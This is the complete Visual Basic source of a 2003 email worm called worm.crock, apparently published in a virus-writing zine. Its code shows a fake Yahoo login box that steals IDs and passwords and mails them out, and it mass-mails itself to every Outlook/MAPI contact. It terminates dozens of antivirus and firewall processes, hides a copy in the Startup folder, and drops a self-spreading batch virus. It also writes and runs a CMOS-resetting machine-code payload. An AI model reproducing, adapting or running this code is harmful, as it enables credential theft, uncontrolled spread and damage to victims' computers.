Redemption
| Last article | Table of contents | Next article |
|---|
| Last article | Table of contents | Next article |
|---|
Strange Article - worm.crock by vAndEEd0
VERSION 5.00
Begin VB.Form Crock
Appearance = 0 'Flat
AutoRedraw = -1 'True
BackColor = &H8000000C&
BorderStyle = 0 'None
Caption = "Form1"
ClientHeight = 2070
ClientLeft = 0
ClientTop = 0
ClientWidth = 4455
DrawMode = 1 'Blackness
ForeColor = &H8000000D&
Icon = "crock.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
Moveable = 0 'False
NegotiateMenus = 0 'False
Picture = "crock.frx":07F2
ScaleHeight = 2070
ScaleWidth = 4455
ShowInTaskbar = 0 'False
StartUpPosition = 2 'CenterScreen
Begin VB.TextBox Text1
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 700
Underline = 0 'False
Italic = -1 'True
Strikethrough = 0 'False
EndProperty
Height = 285
Left = 1080
TabIndex = 3
Top = 600
Width = 3135
End
Begin VB.TextBox Text2
Height = 285
IMEMode = 3 'DISABLE
Left = 1080
PasswordChar = "*"
TabIndex = 2
Top = 1080
Width = 3135
End
Begin VB.CommandButton Command1
Caption = "&OK"
DragIcon = "crock.frx":0FE4
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 1920
TabIndex = 1
Top = 1560
Width = 1095
End
Begin VB.CommandButton Command2
Caption = "&Cancel"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 3120
TabIndex = 0
Top = 1560
Width = 1095
End
Begin VB.Label Label3
Appearance = 0 'Flat
BackColor = &H8000000C&
Caption = "Connect to everything in Y!"
BeginProperty Font
Name = "Arial"
Size = 9.75
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H8000000D&
Height = 255
Left = 720
TabIndex = 6
Top = 120
Width = 3495
End
Begin VB.Label Label1
Appearance = 0 'Flat
AutoSize = -1 'True
BackColor = &H8000000C&
Caption = "Yahoo ID"
BeginProperty Font
Name = "Times New Roman"
Size = 9
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H8000000D&
Height = 225
Left = 120
TabIndex = 5
Top = 600
Width = 735
End
Begin VB.Label Label2
Appearance = 0 'Flat
AutoSize = -1 'True
BackColor = &H8000000C&
Caption = "Password"
BeginProperty Font
Name = "Times New Roman"
Size = 9
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H8000000D&
Height = 225
Left = 120
TabIndex = 4
Top = 1080
Width = 720
End
End
Attribute VB_Name = "Crock"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
' worm.crock
' May 30, 2003 - vAndEEd0
' Features: this is fake yahoo dialog box
' 1. mass mailer only if cancel
' 2. attempt reset cmos. in first tuesday of even month
' 3. register as service
' 4. hidden attribute at startup folder
' 5. drop simple bat infecting virus in startup folder
' 6. disable AV software
' 7. spread to network mail (MAPI recipients) yahoo password and username if ok
' 8. compile with p-code
' 9. used upx124 and crafted
Const TH32CS_SNAPPROCESS As Long = 2&
Const MAX_PATH As Long = 260
Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessId As Long, ByVal dwType As Long) As Long
Dim crockBody As String
Dim crockSubject As String
Dim CrockName As String
Dim BiteFolder As String
' ********************** 1 and 6 ***********************
Private Sub Form_Load()
On Error Resume Next
Dim r As Long
r = RegisterServiceProcess(0&, 1)
Crock.Show
On Error Resume Next
CrockName = String$(MAX_PATH, Chr$(0))
CrockName = Left$(CrockName, GetModuleFileName(0&, CrockName, Len(CrockName)))
Dim hSnapShot As Long
Dim uProcess As PROCESSENTRY32
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
If hSnapShot <> -1 Then
uProcess.dwSize = Len(uProcess)
r = ProcessFirst(hSnapShot, uProcess)
Do While r
die = False
If InStr(UCase(uProcess.szExeFile), UCase("\IOMON98")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Outpost")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\POP3TRAP")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\AVP MONITOR")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Zonealarm")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\NAI_VS_STAT")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\AVPMON")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\BLACKICE")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Wfindv32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Rav")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Vet95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-STOPW")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Webscanx")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Vscan40")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Sweep")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Rescue")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Scan")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avconsol")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Tbscan")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Persfw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Serv95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Safeweb")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pccwin98")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pcfwallicon")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Padmin")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pavw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pavsched")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Pavcl")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nvc95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nupgrade")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Normist")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nmain")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nav")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-Prot")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\N32scanw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Lockdown2000")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Nisum")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Fprot")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Fp-Win")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-Agnt95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Esafe")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\F-Stopw")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avnt")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Blackice")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avwupd32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avsched32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avp")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avwin95")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Avkserv")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Apvxdwin")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Anti-Trojan")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\_Avp")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Ackwin32")) <> 0 Then die = True
If InStr(UCase(uProcess.szExeFile), UCase("\Vshwin32")) <> 0 Then die = True
If die = True Then
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, uProcess.th32ProcessID)
If hProcess Then
KillProcess = (TerminateProcess(hProcess, ExitCode) <> 0)
CloseHandle hProcess
End If
End If
r = ProcessNext(hSnapShot, uProcess)
Loop
End If
Call CloseHandle(hSnapShot)
Set Rso = CreateObject("Wscript.Shell")
Text1.Text = Rso.regread("HKEY_LOCAL_MACHINE\Network\Logon\username")
BiteFolder = Rso.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders\Common Startup")
If BiteFolder = "" Then BiteFolder = Rso.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\explorer\Shell Folders\Common Startup")
If Rso.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\System Signature") = "" Then
Rso.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\System Signature", Rnd(555) * 555 + 1
Else
Crock.Visible = False
End If
Call Bite
End Sub
Private Sub Command1_Click()
'spread password and username
crockBody = "YahooID: " & Text1.Text & vbNewLine & "password: " & Text2.Text
crockSubject = "Your free yahoo account and file!"
Call Crocking
Unload Me
End Sub
Private Sub Command2_Click()
'spread me
crockSubject = "Yahoo Game House"
crockBody = "From the makers of Yahoo Game House, here is a new game from vAndEEd0!" & vbNewLine & vbNewLine & "The Crock" & vbNewLine & vbNewLine & "Yahooligans!"
Call Crocking
Unload Me
End Sub
Private Sub Crocking()
On Error Resume Next
Set Eso = CreateObject("Out" & StrReverse("kool") & "." & StrReverse("ilppA") & "ca" & StrReverse("noit"))
If Eso <> "" Then
Set e1 = Eso.GetNameSpace(StrReverse("IPAM"))
For list1 = 1 To e1.AddressLists.Count
Set eva = Eso.CreateItem(0)
eva.Body = crockBody
eva.Attachments.Add CrockName
eva.Subject = crockSubject
Set ctr = e1.AddressLists.Item(list1)
Set emails = ctr.AddressEntries
For countr1 = 1 To emails.Count
eva.Recipients.Add emails.Item(countr1)
Next countr1
eva.Send
Next
End If
End Sub
Private Sub Jaws()
On Error Resume Next
If Weekday(Now) = 3 And Day(Now) <8 Then
Open "yaHoo.COM" For Output As #1
Print #1, Chr(&HB9) + Chr(&H40) + Chr(&H0) + Chr(&H8A) + Chr(&HC1) + Chr(&HE6) + Chr(&H71) + Chr(&HB0) + Chr(&HFF) + Chr(&HE6) + Chr(&H70) + Chr(&HE2) + Chr(&HF6) + Chr(&HE9) + Chr(&HF0) + Chr(&HFF) + "worm.crock's jaws - vAndEEd0"
Close #1
garbage = Shell("yaHoo.COM", 1)
End If
End Sub
Private Sub Batch()
crocker = "@echo off|rem bat.crock by vAndEEd0"
crocker = crocker & "@copy %0.bat a:" & vnewline
crocker = crocker & "@for %%x in (*.bat \*.bat ..\*.bat c:\*.bat a:\*.bat %windir%\*.bat %winbootdir%\*.bat %temp%\*.bat) do copy %%x+%0.bat %%x|rem bat.crock by vAndEEd0" & vnewline
crocker = crocker & "@copy %0.bat c:" & vnewline
crocker = crocker & "exit" & vnewline
crocker = crocker & "bat.crock" & vnewline
crocker = crocker & "crocko rocks" & vnewline
crocker = crocker & "how simple batch viruses are" & vnewline
crocker = crocker & "very cool huh i like to" & vnewline
crocker = crocker & "format c: /q" & vnewline
crocker = crocker & "vAndEEd0" & vnewline
On Error Resume Next
Set Cso = CreateObject("Scripting.FileSystemObject")
Set file = Cso.CreateTextFile(BiteFolder & "\" & "CROCK.BAT", 1)
file.WriteLine crocker
file.Close
Call Jaws
End Sub
Private Sub Bite()
On Error Resume Next
Randomize
x = Round(Rnd(1) * 1)
ThyName = "CROCK."
Select Case x
Case 0
ThyName = ThyName & "EXE"
Case Else
ThyName = ThyName & "SCR"
End Select
FileCopy CrockName, BiteFolder & "\" & ThyName
SetAttr BiteFolder & "\" & ThyName, vbHidden + vbReadOnly
Call Batch
End Sub